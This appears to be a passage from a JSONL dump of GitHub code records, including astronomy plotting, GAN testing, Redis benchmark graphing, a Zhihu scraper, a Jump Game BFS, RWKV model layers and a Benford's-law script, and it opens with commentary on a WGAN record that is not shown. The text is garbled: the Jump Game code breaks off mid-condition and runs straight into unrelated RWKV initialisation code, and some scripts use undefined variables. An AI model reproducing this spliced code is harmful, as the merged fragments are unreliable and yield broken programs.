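Two editorial notes on the WGAN record above. First, `generator_upsampling` never applies the `n=14` batchnorm to `decoder3` that its deconv twin has (the numbering jumps from 13 to 15), which reads like an accidental omission rather than a design choice. Second, the `tf.assign`/`tf.clip_by_value` pair after the critic update is the original WGAN weight-clipping constraint that keeps the critic roughly Lipschitz; isolated, the pattern is just this (a graph-mode sketch via `tf.compat.v1`, matching the TF1 style of the file):

```python
import tensorflow.compat.v1 as tf  # graph-mode sketch to match the file above

tf.disable_eager_execution()

w = tf.get_variable("critic_w", initializer=[[1.5, -0.7], [0.01, 3.0]])
clip_op = tf.assign(w, tf.clip_by_value(w, -0.02, 0.02))  # run after each critic step

with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    sess.run(clip_op)
    print(sess.run(w))  # every entry now lies in [-0.02, 0.02]
```

Later work (WGAN-GP) replaces hard clipping with a gradient penalty to avoid the capacity loss that clipping causes.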
'Night']\nTIME_SYMBOLS = (u's', u'ms', u'\\u00B5s', u'ns', u'ps', u'fs', u'as', u'zs', u'ys')\nTIME_VALUES = tuple([math.pow(10, -3*i) for i in range(len(TIME_SYMBOLS))])\nUTC_FORMAT = re.compile(r'\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}.\\d{3}')\n\n\n# +\n# update catalog\n# -\n# _cat_file = os.path.abspath(os.path.expanduser(f\"{os.getenv('HOME')}/.{CAT_FILE}.dat\"))\n# _cat_date = CAT_DATE\n# if os.path.exists(_cat_file):\n# with open(_cat_file, 'r') as _fr:\n# _cat_date = float(_fr.read())\n# print(f\"_cat_date = {_cat_date}\")\n# print(f\"CAT_DATE = {CAT_DATE}\")\n#\n# if (float(CAT_DATE) - float(_cat_date)) > 7.0:\n# try:\n# # iers.IERS_A_URL = 'ftp://cddis.gsfc.nasa.gov/pub/products/iers/{CAT_FILE}.all'\n# astroplan.download_IERS_A()\n# except Exception:\n# print(f\"Failed to update {_cat_file}\")\n# try:\n# print(f\"Updating {_cat_date}\")\n# os.remove(_cat_file)\n# with open(_cat_file, 'w') as _fw:\n# _fw.write(f\"{CAT_DATE}\\n\")\n# except Exception:\n# pass\n\n\n# +\n# time some thing(s)\n# -\n@timeit\ndef _time_wrapper(_utc=''):\n if not isinstance(_utc, str) or re.match(UTC_FORMAT, _utc) is None:\n return None\n return Time(f'{_utc}')\n\n\n@timeit\ndef _midnight_wrapper(_utc=''):\n if not isinstance(_utc, str) or re.match(UTC_FORMAT, _utc) is None:\n return None\n return mjd_to_utc(math.floor(utc_to_mjd(_utc) + 1.0))\n\n\n@timeit\ndef _coords_wrapper(_name=''):\n if not isinstance(_name, str) or _name.strip() == '':\n return None\n return SkyCoord.from_name(f'{_name}')\n\n\n@timeit\ndef _altaz_wrapper(_target=None, _time=None):\n if _target is None or _time is None:\n return None\n return _target.transform_to(AltAz(obstime=_time, location=KUIPER))\n\n\n@timeit\ndef _d_array_wrapper():\n # noinspection PyUnresolvedReferences\n return np.linspace(-12, 12, 400)*u.hour\n\n\n@timeit\ndef _d_times_wrapper(_midnight=None, _d_array=None):\n return Time(_midnight)+_d_array\n\n\n@timeit\ndef _d_frame_wrapper(_d_times=None, _location=None):\n return AltAz(obstime=_d_times, location=_location)\n\n\n@timeit\ndef _d_sun_wrapper(_d_times=None, _d_frame=None):\n return get_sun(_d_times).transform_to(_d_frame)\n\n\n@timeit\ndef _d_moon_wrapper(_d_times=None, _d_frame=None):\n return get_moon(_d_times).transform_to(_d_frame)\n\n\n@timeit\ndef _d_altazs_wrapper(_target=None, _d_frame=None):\n return _target.transform_to(_d_frame)\n\n\n# +\n# function: plot()\n# -\ndef plot(_name='', _plot='', _utc='', _verbose=True):\n\n # check input(s)\n if not isinstance(_name, str) or _name.strip() == '':\n raise Exception(f'Invalid argument, _name={_name}')\n if not isinstance(_plot, str) or _plot.lower() not in [_x.lower() for _x in PLOT_TYPES]:\n raise Exception(f'Invalid argument, _plot={_plot}')\n if not isinstance(_utc, str) or re.match(UTC_FORMAT, _utc) is None:\n raise Exception(f'Invalid argument, _utc={_utc}')\n _verbose = _verbose if isinstance(_verbose, bool) else False\n\n # convert (with timing)\n _time = _time_wrapper(f'{_utc}')\n _midnight = _midnight_wrapper(f'{_utc}')\n _target = _coords_wrapper(f'{_name}')\n _target_altaz = _altaz_wrapper(_target, _time)\n\n # select plot\n if _plot.lower() == 'airmass':\n\n try:\n # calculate\n # noinspection PyUnresolvedReferences\n _m_array = np.linspace(-2, 10, 100)*u.hour\n _m_times = Time(_midnight)+_m_array\n _m_frame = AltAz(obstime=_m_times, location=KUIPER)\n _m_altazs = _target.transform_to(_m_frame)\n _m_airmass = _m_altazs.secz\n if _verbose:\n print(f\"_m_array = {_m_array}\")\n print(f\"_m_times = {_m_times}\")\n print(f\"_m_frame = 
{_m_frame}\")\n print(f\"_m_altazs = {_m_altazs}\")\n print(f\"_m_airmass = {_m_airmass}\")\n\n # plot\n plt.plot(_m_array, _m_airmass)\n plt.xlim(-2, 10)\n plt.ylim(1, 4)\n plt.xlabel('Hours from Midnight')\n plt.ylabel('Airmass [Sec(z)]')\n plt.show()\n except Exception:\n raise Exception(f'Invalid airmass plot, _name={_name}')\n\n elif _plot.lower() == 'night':\n\n try:\n # calculate\n # _d_array = np.linspace(-12, 12, 400)*u.hour\n _d_array = _d_array_wrapper()\n\n # _d_times = Time(_midnight)+_d_array\n _d_times = _d_times_wrapper(_midnight, _d_array)\n\n # _d_frame = AltAz(obstime=_d_times, location=KUIPER)\n _d_frame = _d_frame_wrapper(_d_times, KUIPER)\n\n # _d_sun = get_sun(_d_times).transform_to(_d_frame)\n _d_sun = _d_sun_wrapper(_d_times, _d_frame)\n\n # _d_moon = get_moon(_d_times).transform_to(_d_frame)\n _d_moon = _d_moon_wrapper(_d_times, _d_frame)\n\n # _d_altazs = _target.transform_to(_d_frame)\n _d_altazs = _d_altazs_wrapper(_target, _d_frame)\n\n # if _verbose:\n # print(f\"_d_array = {_d_array}\")\n # print(f\"_d_times = {_d_times}\")\n # print(f\"_d_frame = {_d_frame}\")\n # print(f\"_d_sun = {_d_sun}\")\n # print(f\"_d_moon = {_d_moon}\")\n # print(f\"_d_altazs = {_d_altazs}\")\n\n # plot\n plt.plot(_d_array, _d_sun.alt, color='r', label='Sun')\n plt.plot(_d_array, _d_moon.alt, color=[0.75]*3, ls='--', label='Moon')\n plt.scatter(_d_array, _d_altazs.alt, c=_d_altazs.az, label=f'{_name}', lw=0, s=8, cmap='viridis')\n plt.fill_between(_d_array.to('hr').value, 0, 90, _d_sun.alt < -0*u.deg, color='0.5', zorder=0)\n plt.fill_between(_d_array.to('hr').value, 0, 90, _d_sun.alt < -18*u.deg, color='k', zorder=0)\n plt.colorbar().set_label('Azimuth [deg]')\n plt.legend(loc='upper left')\n plt.xlim(-12, 12)\n plt.xticks(np.arange(13)*2 - 12)\n plt.ylim(0, 90)\n plt.xlabel('Hours from Midnight')\n plt.ylabel('Altitude [deg]')\n plt.show()\n except Exception:\n raise Exception(f'Invalid night plot, _name={_name}')\n\n\n# +\n# main()\n# -\nif __name__ == '__main__':\n\n # get command line argument(s)\n _p = argparse.ArgumentParser(description=f'Read Database File', formatter_class=argparse.RawTextHelpFormatter)\n _p.add_argument(f'--name', default='M33', help=\"\"\"Object name, default=%(default)s\"\"\")\n _p.add_argument(f'--plot', default=PLOT_TYPES[1], help=f\"\"\"Plot type, default=%(default)s, one of {PLOT_TYPES}\"\"\")\n _p.add_argument(f'--utc', default=get_utc(), help=\"\"\"UTC date/time, default=%(default)s\"\"\")\n _p.add_argument(f'--verbose', default=False, action='store_true', help=f'if present, produce more verbose output')\n args = _p.parse_args()\n plot(_name=args.name, _plot=args.plot, _utc=args.utc, _verbose=bool(args.verbose))\n","repo_name":"pndaly/ARTN-ORP","sub_path":"utils/plot_kuiper.py","file_name":"plot_kuiper.py","file_ext":"py","file_size_in_byte":9280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43966402487","text":"from data.data_loader import get_data_loader\nfrom models.models import create_model\nfrom option_parser import TestingOptionParser\nimport torchvision.utils as vutils\nimport numpy as np\nimport torch\nimport os\n\nparser = TestingOptionParser()\nopt = parser.parse_args()\nopt.batch_size = opt.repeat_generation\nopt.gpu_ids = []\n\ndata_loader = get_data_loader(opt)\n\nmodel = create_model(opt)\ntotal_steps = 0\nmodel.load(opt.epoch)\nTensor = torch.cuda.FloatTensor if opt.gpu_ids else torch.FloatTensor\nsingle_input = Tensor(\n 1,\n opt.input_channel,\n opt.height,\n 
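The `timeit` decorator in the plot_kuiper record above measures elapsed time by round-tripping UTC strings through MJD floats, which costs two datetime conversions per call and caps the usable resolution; `time.perf_counter()` is the standard-library tool for this. (Separately, the `iers.IERS_A_URL` assignment is missing its `f` prefix, so `{CAT_FILE}` is never substituted — harmless only because the download block is commented out.) A drop-in sketch of the decorator:

```python
import functools
import time

def timeit(func):
    # same logging shape as above, timed with a monotonic high-resolution clock;
    # unlike the original, this version re-raises instead of swallowing exceptions
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        start = time.perf_counter()
        try:
            return func(*args, **kwargs)
        finally:
            elapsed = time.perf_counter() - start
            print(f'  {func.__name__}() took {elapsed:.6f} s')
    return wrapper

@timeit
def slow():
    time.sleep(0.1)

slow()  # prints something like "  slow() took 0.100123 s"
```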
opt.width\n)\nrepeated_input = Tensor(\n opt.batch_size,\n opt.input_channel,\n opt.height,\n opt.width\n)\n\nfor i, data in enumerate(data_loader):\n print(i)\n test_dir = os.path.join(opt.test_dir, opt.model)\n if i >= opt.test_count:\n break\n # cifar_dir = '/home/lzh/cifar'\n # misc.imsave(cifar_dir + '/' + 'real_{}.png'.format(i), np.transpose(data[0][0].numpy(), [1, 2, 0]))\n single_input.copy_(\n data[0][0].view(\n 1,\n opt.input_channel,\n opt.height,\n opt.width\n )\n )\n repeated_input.copy_(\n single_input.repeat(opt.batch_size, 1, 1, 1)\n )\n\n model.set_input(repeated_input)\n model.test()\n\n visuals = model.get_visuals(sample_single_image=False)\n for j in range(opt.batch_size):\n save_path = test_dir+'/fake_%d.png' % (i*100+j)\n vutils.save_image(visuals.data[j], save_path)\n #misc.imsave(test_dir + '/' + 'fake_{}_{}.png'.format(i, j), np_image)\n","repo_name":"hhqweasd/RGNet","sub_path":"test_50k.py","file_name":"test_50k.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29352902107","text":"import progbg as sb\nimport progbg.graphing as g\nimport progbg.formatters as f\nimport os\nimport re\n\nROOT_DIR=os.environ[\"OUT\"]\nMODE=os.environ[\"MODE\"]\nHOSTS=os.environ[\"EXTERNAL_HOSTS\"].split()\n\nif MODE == \"VM\":\n fs = [\"100\", \"200\", \"300\", \"400\", \"500\", \"600\", \"700\", \"800\", \"900\", \"1000\"]\nelse:\n fs = [\"10\", \"20\", \"30\", \"40\", \"50\", \"60\", \"70\", \"80\", \"90\", \"100\"]\n\ndef get_num(val):\n try:\n return float(val)\n except:\n for i, x in enumerate(val):\n if x.isnumeric() or x == \".\":\n continue\n break\n\n return float(val[:i])\n\ndef parse_redis(metrics, path):\n pattern = re.compile(\"Throughput\")\n result = None\n throughputs = []\n with open(path) as f:\n for line in f:\n line = str(line.encode('UTF-8'))\n if \"Throughput\" in line:\n t = get_num(line.split()[-1])\n if t == 0:\n break\n throughputs.append(t)\n if \"Connection refused\" in line:\n print(\"Connection refused error!\")\n break\n if len(throughputs) != len(HOSTS):\n print(\"[Error] {} did not execute or pre-emptively shut down, please re-run fig4a.sh\".format(path))\n os.unlink(path)\n else:\n metrics.add_metric(\"throughput\", sum(throughputs))\n\nbase_path = os.path.join(ROOT_DIR, \"redis\")\nconst_base = os.path.join(base_path, \"base\")\nbase = sb.plan_parse(const_base, const_base, parse_redis)\n\nexecs = []\nfor x in fs:\n freq_path = os.path.join(base_path, x)\n execs.append(sb.plan_parse(freq_path, freq_path, parse_redis))\n\n\nx=[ int(x) for x in fs ]\nl1 = g.Line(execs, \"throughput\", x=x, label=\"With Aurora\")\nl2 = g.ConstLine(base, \"Base\", \"throughput\")\nfig4a = sb.plan_graph(g.LineGraph([l1, l2], std=True,\n out=\"fig4a.svg\",\n formatters=[ \n f.set_size(10, 5),\n f.set_yrange(0, None),\n f.yaxis_formatter(label=\"Operations per second\"),\n f.xaxis_formatter(\"Checkpoint Period\"),\n f.set_title(\"Redis with Aurora\"),\n ]\n))\n","repo_name":"rcslab/aurora-bench","sub_path":"artifact_evaluation/graphing/fig4a.py","file_name":"fig4a.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"38315976659","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/en/latest/topics/items.html\n\nimport scrapy\n\nfrom scrapy.selector import Selector\nfrom scrapy.spiders 
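`get_num` in the fig4a record above scans characters until the first non-numeric one and slices, which fails on tokens like `"k10"` (it ends up calling `float("")`) and ignores leading signs. Matching the leading number with a regex is sturdier; a sketch:

```python
import re

def get_num(val):
    # parse the leading (possibly signed, possibly fractional) number of a token
    # like "123", "10.5k", or "-3ms"; raises ValueError if none is present
    m = re.match(r"[-+]?(\d+\.?\d*|\.\d+)", str(val).strip())
    if m is None:
        raise ValueError(f"no leading number in {val!r}")
    return float(m.group())

print(get_num("10.5k"))  # 10.5
print(get_num("-3ms"))   # -3.0
```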
import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.http import Request,FormRequest\n\n# import scrapy\nfrom zhihu.items import ZhihuItem\nfrom zhihu.settings import *\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nclass ZhihuSpider(scrapy.Spider):\n name = \"zhihu\"\n allowed_domains = [\"zhihu.com\"]\n start_urls = [\n \"https://www.zhihu.com/#signin\"\n ]\n\n rules = (\n Rule(LinkExtractor(allow=('/question/\\d+#answer-\\d+')), callback='parse_item', follow=True),\n Rule(LinkExtractor(allow=('/question/\\d+')), callback='parse_item', follow=True)\n )\n\n def __init__(self):\n self.headers=HEADER\n self.cookies=COOKIES\n\n def start_requests(self):\n for i, url in enumerate(self.start_urls):\n yield FormRequest(\n url, meta = {'cookiejar': i},\n headers=self.headers,\n cookies=self.cookies,\n callback=self.parse_item)\n\n def parse_item(self, response):\n # print response.body\n selector = Selector(response)\n\n # print 'Start extract data from response ..............'\n items = []\n for elem in selector.xpath('//div[@class=\"feed-content\"]/h2[@class=\"feed-title\"]'):\n item = ZhihuItem()\n item['title'] = elem.xpath('a/text()').extract()\n item['link'] = elem.xpath('a/@href').extract()\n items.append(item)\n\n print(item['title'].decode())\n print(item['link'].decode())\n # print 'Finish extract data........................'\n return items\n","repo_name":"zhushh/PythonCode","sub_path":"scrapy/zhihu/zhihu/spiders/zhihu_spider.py","file_name":"zhihu_spider.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34342443292","text":"T = int(input())\n\nfor t in range(1, T+1):\n numbers = map(int,input().split())\n holls = []\n for number in numbers :\n if 1 == number % 2 :\n holls.append(number)\n\n print(f'#{t} {sum(holls)}')","repo_name":"gata96/EXAM-01","sub_path":"2200075/홀수만 더하기.py","file_name":"홀수만 더하기.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"70667469281","text":"from fastapi import APIRouter, Depends\n\nfrom auth.base_config import current_user\n\nfrom .tasks import send_email\n\nrouter = APIRouter(prefix='/report', tags=['Tasks'])\n\n\n@router.get('/send_report')\ndef get_report(user=Depends(current_user)):\n send_email.delay(user.username, user.email)\n return {\n 'status': 200,\n 'data': 'Письмо отправлено',\n 'details': None\n }","repo_name":"dimansidorov/fastapi_project","sub_path":"src/tasks/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4832363123","text":"# 1306. 
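The zhihu spider record above is Python 2 era: `reload(sys)`/`sys.setdefaultencoding` no longer exist, `extract()` returns a list (so the trailing `.decode()` calls would raise), and `rules` only take effect on a `CrawlSpider`, not a plain `scrapy.Spider`. A Python 3 sketch of the same extraction step, assuming the same page structure:

```python
import scrapy

class ZhihuFeedSpider(scrapy.Spider):
    # minimal Python 3 rewrite sketch; the login cookies/headers are omitted
    name = "zhihu_feed"
    start_urls = ["https://www.zhihu.com/#signin"]

    def parse(self, response):
        for elem in response.xpath('//div[@class="feed-content"]/h2[@class="feed-title"]'):
            yield {
                "title": elem.xpath("a/text()").get(),  # .get() returns one str or None
                "link": elem.xpath("a/@href").get(),
            }
```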
Jump Game III\n# dfs until we reach a zero we have two options at all times \n# go front and go back which acts like two edges\nfrom collections import deque\nclass Solution:\n def canReach(self, arr: List[int], start: int) -> bool:\n if arr[start]==0:\n return True\n N = len(arr)\n visited = set([start])\n que = deque([start])\n \n while que:\n node = que.popleft()\n front = node + arr[node]\n back = node - arr[node]\n \n if 0<=front shape[1]:\n gain = math.sqrt(shape[0] / shape[1])\n if shape[0] == config.vocab_size and shape[1] == config.n_embd: # final projection?\n scale = config.rwkv_emb_scale\n\n if isinstance(m, nn.Embedding):\n gain = math.sqrt(max(shape[0], shape[1]))\n if shape[0] == config.vocab_size and shape[1] == config.n_embd: # token emb?\n scale = config.rwkv_emb_scale\n\n if hasattr(m, 'scale_init'):\n scale = m.scale_init\n\n print(str(shape[0]).ljust(5), str(shape[1]).ljust(5), f'{round(scale,2):g}'.ljust(4), name)\n\n gain *= scale\n if gain == 0:\n nn.init.zeros_(m.weight) # zero init is great for some RWKV matrices\n elif gain > 0:\n nn.init.orthogonal_(m.weight, gain=gain)\n else:\n nn.init.normal_(m.weight, mean=0, std=-gain)\n\nclass RWKV_TimeMix(nn.Module):\n def __init__(self, config, layer_id):\n super().__init__()\n assert config.n_attn % config.n_head == 0\n self.layer_id = layer_id\n self.ctx_len = config.ctx_len\n self.n_head = config.n_head\n self.head_size = config.n_attn // config.n_head\n\n with torch.no_grad(): # initial time_w curves for better convergence\n ww = torch.ones(config.n_head, config.ctx_len)\n curve = torch.tensor([-(config.ctx_len - 1 - i) for i in range(config.ctx_len)]) # the distance\n for h in range(config.n_head):\n if h < config.n_head - 1:\n decay_speed = math.pow(config.ctx_len, -(h+1)/(config.n_head-1))\n else:\n decay_speed = 0.0\n ww[h] = torch.exp(curve * decay_speed)\n # print('layer', layer_id, 'head', h, 'decay_speed', round(decay_speed, 4), ww[h][:5].numpy(), '...', ww[h][-5:].numpy())\n self.time_w = nn.Parameter(ww)\n\n self.time_alpha = nn.Parameter(torch.ones(self.n_head, 1, config.ctx_len))\n self.time_beta = nn.Parameter(torch.ones(self.n_head, config.ctx_len, 1))\n self.time_gamma = nn.Parameter(torch.ones(config.ctx_len, 1))\n \n self.time_shift = nn.ZeroPad2d((0,0,1,-1))\n\n self.key = nn.Linear(config.n_embd, config.n_attn)\n self.value = nn.Linear(config.n_embd, config.n_attn)\n self.receptance = nn.Linear(config.n_embd, config.n_attn)\n\n # if config.rwkv_tiny_attn > 0:\n # self.tiny_att = RWKV_TinyAttn(config)\n\n self.output = nn.Linear(config.n_attn, config.n_embd)\n\n self.key.scale_init = 0\n self.receptance.scale_init = 0\n self.output.scale_init = 0\n\n def forward(self, x):\n B, T, C = x.size()\n TT = self.ctx_len\n w = F.pad(self.time_w, (0, TT))\n w = torch.tile(w, [TT])\n w = w[:, :-TT].reshape(-1, TT, 2 * TT - 1)\n w = w[:, :, TT-1:] # w is now a circulant matrix\n w = w[:, :T, :T] * self.time_alpha[:, :, :T] * self.time_beta[:, :T, :]\n\n x = torch.cat([self.time_shift(x[:, :, :C//2]), x[:, :, C//2:]], dim = -1)\n # if hasattr(self, 'tiny_att'):\n # tiny_att = self.tiny_att(x, self.mask)\n\n k = self.key(x)\n v = self.value(x)\n r = self.receptance(x)\n\n k = torch.clamp(k, max=30, min=-60) # clamp extreme values. 
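The BFS above tracks visited indices in a set; a common constant-extra-space variant for this problem marks a cell visited by negating it in place (values are non-negative, and any reachable 0 returns before its mark could matter). A sketch — note it mutates its input:

```python
from collections import deque

def can_reach(arr, start):
    # BFS over the two "edges" i +/- arr[i]; visited cells are negated in place
    q = deque([start])
    while q:
        i = q.popleft()
        if arr[i] == 0:
            return True
        if arr[i] < 0:
            continue  # already visited
        for j in (i + arr[i], i - arr[i]):
            if 0 <= j < len(arr):
                q.append(j)
        arr[i] = -arr[i]  # mark visited
    return False

print(can_reach([4, 2, 3, 0, 3, 1, 2], 5))  # True
```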
e^30 = 10^13\n k = torch.exp(k)\n sum_k = torch.cumsum(k, dim=1)\n\n kv = (k * v).view(B, T, self.n_head, self.head_size)\n\n wkv = (torch.einsum('htu,buhc->bthc', w, kv)).contiguous().view(B, T, -1)\n\n rwkv = torch.sigmoid(r) * wkv / sum_k\n\n rwkv = self.output(rwkv)\n # if hasattr(self, 'tiny_att'):\n # rwkv += tiny_att\n\n return rwkv * self.time_gamma[:T, :]\n\nclass RWKV_ChannelMix(nn.Module):\n def __init__(self, config, layer_id):\n super().__init__()\n self.layer_id = layer_id\n self.time_shift = nn.ZeroPad2d((0,0,1,-1))\n \n hidden_sz = 5 * config.n_ffn // 2 # can use smaller hidden_sz because of receptance gating\n self.key = nn.Linear(config.n_embd, hidden_sz)\n self.value = nn.Linear(config.n_embd, hidden_sz)\n self.weight = nn.Linear(hidden_sz, config.n_embd)\n self.receptance = nn.Linear(config.n_embd, config.n_embd)\n\n self.receptance.scale_init = 0\n self.weight.scale_init = 0\n\n def forward(self, x):\n B, T, C = x.size()\n \n x = torch.cat([self.time_shift(x[:, :, :C//2]), x[:, :, C//2:]], dim = -1)\n k = self.key(x)\n v = self.value(x)\n r = self.receptance(x)\n \n wkv = self.weight(F.mish(k) * v) # i find mish is a bit better than gelu\n\n rwkv = torch.sigmoid(r) * wkv\n\n return rwkv\n\nclass RWKV_TinyAttn(nn.Module): # extra tiny attention\n def __init__(self, config):\n super().__init__()\n self.d_attn = config.rwkv_tiny_attn\n self.n_head = config.rwkv_tiny_head\n self.head_size = self.d_attn // self.n_head\n\n self.qkv = nn.Linear(config.n_embd, self.d_attn * 3)\n self.out = nn.Linear(self.d_attn, config.n_embd)\n\n def forward(self, x, mask):\n B, T, C = x.size()\n qkv = self.qkv(x)\n q, k, v = qkv.chunk(3, dim = -1)\n\n if self.n_head > 1:\n q = q.view(B, T, self.n_head, self.head_size).transpose(1, 2) # (B, T, C) -> (B, nh, T, hs)\n k = k.view(B, T, self.n_head, self.head_size).transpose(1, 2) # (B, T, C) -> (B, nh, T, hs)\n v = v.view(B, T, self.n_head, self.head_size).transpose(1, 2) # (B, T, C) -> (B, nh, T, hs)\n\n qk = (q @ k.transpose(-2, -1)) * (1.0 / math.sqrt(self.head_size)) # (B, nh, T, hs) * (B, nh, hs, T) -> (B, nh, T, T)\n qk = qk.masked_fill(mask == 0, float('-inf'))\n qk = F.softmax(qk, dim = -1)\n qkv = qk @ v # (B, nh, T, T) * (B, nh, T, hs) -> (B, nh, T, hs)\n\n if self.n_head > 1:\n qkv = qkv.transpose(1, 2).contiguous().view(B, T, -1) # (B, nh, T, hs) -> (B, T, nh, hs) -> (B, T, C)\n \n return self.out(qkv)\n \nclass Block(nn.Module):\n def __init__(self, config, layer_id):\n super().__init__()\n self.config = config\n\n self.ln1 = nn.LayerNorm(config.n_embd)\n self.ln2 = nn.LayerNorm(config.n_embd)\n\n self.attn = RWKV_TimeMix(config, layer_id)\n self.mlp = RWKV_ChannelMix(config, layer_id)\n\n def forward(self, x):\n x = x + self.attn(self.ln1(x))\n x = x + self.mlp(self.ln2(x))\n \n return x","repo_name":"lukasVierling/COMP4771","sub_path":"models/RWKV.py","file_name":"RWKV.py","file_ext":"py","file_size_in_byte":8074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21499369094","text":"#printf \"\\e[?2004l\"\nfrom __future__ import print_function, division, absolute_import\n\n# Imports\nimport os, sys, matplotlib, h5py, random, glob, json\nimport numpy as np, matplotlib.pyplot as plt, tensorflow as tf\n\nmatplotlib.use('Agg')\n\nfrom tensorflow import keras\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.models import model_from_yaml\nfrom tensorflow.keras import backend as K\n#import pandas as pd\n\n#random seed to control the reproducability\nseed = 
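The pad/tile/reshape sequence in `RWKV_TimeMix.forward` above is the trickiest part of the record: it turns each head's length-`T` `time_w` vector into a `T x T` lower-triangular matrix whose row `t` holds the decay applied to every position `u <= t` (entry `(t, u)` is `w[T-1-(t-u)]`, so the current token always gets `w[-1]`). The same index gymnastics in plain numpy, small enough to print and inspect:

```python
import numpy as np

T = 4
w = np.arange(1.0, T + 1)                    # stands in for one head's time_w
padded = np.concatenate([w, np.zeros(T)])    # F.pad(time_w, (0, TT))
tiled = np.tile(padded, T)[:-T]              # torch.tile(...) then drop the last TT
circulant = tiled.reshape(T, 2 * T - 1)[:, T - 1:]  # same slices as in forward()
print(circulant)
# [[4. 0. 0. 0.]
#  [3. 4. 0. 0.]
#  [2. 3. 4. 0.]
#  [1. 2. 3. 4.]]
```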
8675309\nnp.random.seed(seed)\n#np.random.seed(datetime.datetime.now().microsecond)\npath = '/pylon5/as5phnp/tbilling/sandbox/hyper_param_optimiz/ml_paper1/opt_versions/200steps/'\ndata_path = path+'opt_2DConv_dense_layer_200Steps/'\nmodel_path = path\noutputdir = model_path\n\ndef Mean_Squared_over_true_Error(y_true, y_pred):\n # Create a custom loss function that divides the difference by the true\n y_true = K.cast(y_true, y_pred.dtype) #Casts a tensor to a different dtype and returns it.\n diff_ratio = K.square((y_pred - y_true)/K.clip(K.abs(y_true),K.epsilon(),None))\n loss = K.mean(diff_ratio, axis=-1)\n # Return a function\n\n return loss\n\ndef r2_keras(y_true, y_pred):\n SS_res = K.sum(K.square(y_true - y_pred))\n SS_tot = K.sum(K.square(y_true - K.mean(y_true)))\n return ( 1 - SS_res/(SS_tot + K.epsilon()) )\n\nmodels = sorted(glob.glob(model_path+\"hyperParam_model_*.h5\"))\n\nfor m in models:\n #custom_objects={\"r2_keras\":r2_keras}\n model = load_model(m, compile=True,\n custom_objects={\"r2_keras\":r2_keras, \"Mean_Squared_over_true_Error\":Mean_Squared_over_true_Error})\n model.compile(optimizer=keras.optimizers.Adam(lr=0.0001, decay=0.),\n loss=Mean_Squared_over_true_Error,\n metrics=[r2_keras,'mse', 'mae', 'mape'])\n\n\n# save as YAML\nyaml_string = model.to_yaml()\n\n# model reconstruction from YAML:\nmodel = model_from_yaml(yaml_string)\n\n\n# read json files\ntrial_files = glob.glob(data_path+\"/trial_*/trial.json\")\n\nwith open(trial_files[0]) as f:\n data = json.load(f)\n\nbestmodel = load_model(\"__hyperParam_model.h5\",custom_objects={\"r2_keras\":r2_keras,\"Mean_Squared_over_true_Error\":Mean_Squared_over_true_Error})\n\nbestmodel.compile(optimizer=keras.optimizers.Adam(lr=0.0001, decay=0.),\n loss=Mean_Squared_over_true_Error,\n metrics=[r2_keras,'mse', 'mae', 'mape'])\n \nnp.array(list(bestmodel.layers[0].variables))[1]\nscore=bestmodel.evaluate(val_x, val_y, batch_size=32, verbose=1)\n\n# WARNING:tensorflow:Error in loading the saved optimizer state. 
As a result, your model is starting with a freshly initialized optimizer.\n","repo_name":"TashaleeB/ThesisResearch","sub_path":"ML/scripts/RandomSearchOptimization/read_in_model.py","file_name":"read_in_model.py","file_ext":"py","file_size_in_byte":2619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16911859174","text":"\"\"\"Python Program to Find the Factorial of a Number Using Recursion\"\"\"\n\ndef factorial_number(s):\n    def helper(x):\n        if x > 0 and type(x) == int:\n            return s(x)\n        else:\n            raise Exception(\"Input must be a positive integer\")\n    return helper\n\n@factorial_number\ndef factorial(n):\n    if n == 1:\n        return 1\n    else:\n        return n * factorial(n-1)\n\nn = int(input())\nprint(factorial(n))","repo_name":"nekapoor7/Python-and-Django","sub_path":"Python/cppsecrets.com/program 56.py","file_name":"program 56.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9347788987","text":"# File: Benford.py\n\n# Description: reads the census data and prints the count of numbers for each leading digit and their percentage\n\n# Student Name: Arturo Reyes Munoz\n\n# Student UT EID: ar48836\n\n# Course Name: CS 303E\n\n# Unique Number: 50865\n\n# Date Created: 04/21\n\n# Date Last Modified: 04/21\n\ndef main():\n\n\tpop_freq = {}\n\tpop_freq [1] = 0\n\tpop_freq [2] = 0\n\tpop_freq [3] = 0\n\tpop_freq [4] = 0\n\tpop_freq [5] = 0\n\tpop_freq [6] = 0\n\tpop_freq [7] = 0\n\tpop_freq [8] = 0\n\tpop_freq [9] = 0\n\n\tfile = open (\"./Census_2009.txt\", \"r\")\n\n\theader = file.readline()\n\n\ttotal = 0\n\n\tfor line in file:\n\n\t\tline = line.strip()\n\t\tpop_data = line.split()\n\t\tpop_num = pop_data[-1]\n\t\tpop_freq [int(pop_num[0])] += 1\n\t\ttotal+=1\n\n\tprint('Digit Count %')\n\n\tpercentage = []\n\tspace = '    '\n\n\tfor i in range(1,10):\n\t\tif len(str(pop_freq[i]))<4:\n\t\t\tspace = '     '\n\t\tpercentage.append(round((pop_freq[i]*100/total),1))\n\t\tprint(str(i)+' 